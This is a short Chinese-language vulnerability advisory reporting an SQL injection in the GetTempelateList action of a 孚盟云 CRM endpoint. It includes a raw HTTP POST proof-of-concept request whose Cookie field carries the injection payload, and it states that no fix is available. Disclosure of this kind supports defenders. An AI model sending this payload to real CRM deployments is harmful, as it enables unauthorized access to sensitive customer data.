孚盟云CRM /m/Dingding/Ajax/AjaxBusinessPriceActiveReports.ashx GetTempelateList SQL 注入漏洞
漏洞描述
孚盟云 CRM 系统中, /m/Dingding/Ajax/AjaxBusinessPriceActiveReports.ashx 接口的 GetTempelateList 方法存在 SQL 注入漏洞,该接口在处理用户传入参数时未进行有效的过滤和参数化处理,攻击者可构造恶意 SQL 语句注入后台数据库查询,从而在未授权的情况下获取数据库中的敏感信息。 POST /m/Dingding/Ajax/AjaxBusinessPriceActiveReports.ashx HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Content-Length: 23 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Connection: close Cookie: UserCookie={"custNo":"1')"} action=GetTempelateList
影响范围
孚盟云CRM
修复建议
暂无